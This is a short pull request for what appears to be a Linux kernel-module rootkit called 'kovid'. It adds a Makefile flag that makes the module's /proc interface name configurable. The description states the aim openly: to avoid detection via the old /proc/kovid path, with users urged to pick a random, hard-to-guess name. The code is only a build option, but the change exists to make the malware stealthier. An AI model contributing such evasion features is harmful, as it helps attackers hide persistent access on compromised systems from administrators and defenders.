### PR TITLE
Fix for #47

### DIFF
--- a/Makefile
+++ b/Makefile
@@ -9,7 +9,8 @@ endif
 LD=$(shell which ld)
 AS=$(shell which as)
 CTAGS=$(shell which ctags))
-COMPILER_OPTIONS := -Wall \
+# PROCNAME, /proc/<name> interface. You must change it.
+COMPILER_OPTIONS := -Wall -DPROCNAME='"changeme"' \
 	-DMODNAME='"kovid"' -DKSOCKET_EMBEDDED ${DEBUG_PR} -DCPUHACK -DPRCTIMEOUT=1200
 
 EXTRA_CFLAGS := -I$(src)/src -I$(src)/fs ${COMPILER_OPTIONS}


### PR DESCRIPTION
Revert procname changes to avoid messing with sysfs

turns out that module_param will, of course!, create:
	/sys/module/<name>/parameters/
forcing kovid to handle the new sysfs kobject and adding more sysfs handling for init and deinit, something that I want to avoid.

This way here we still avoid detection via old /proc/kovid, making the user to explicitly defining a /proc/<name> for the lkm. So it is up to the user to be creative and chose a difficult to guess name, hopefully, random, for his own good.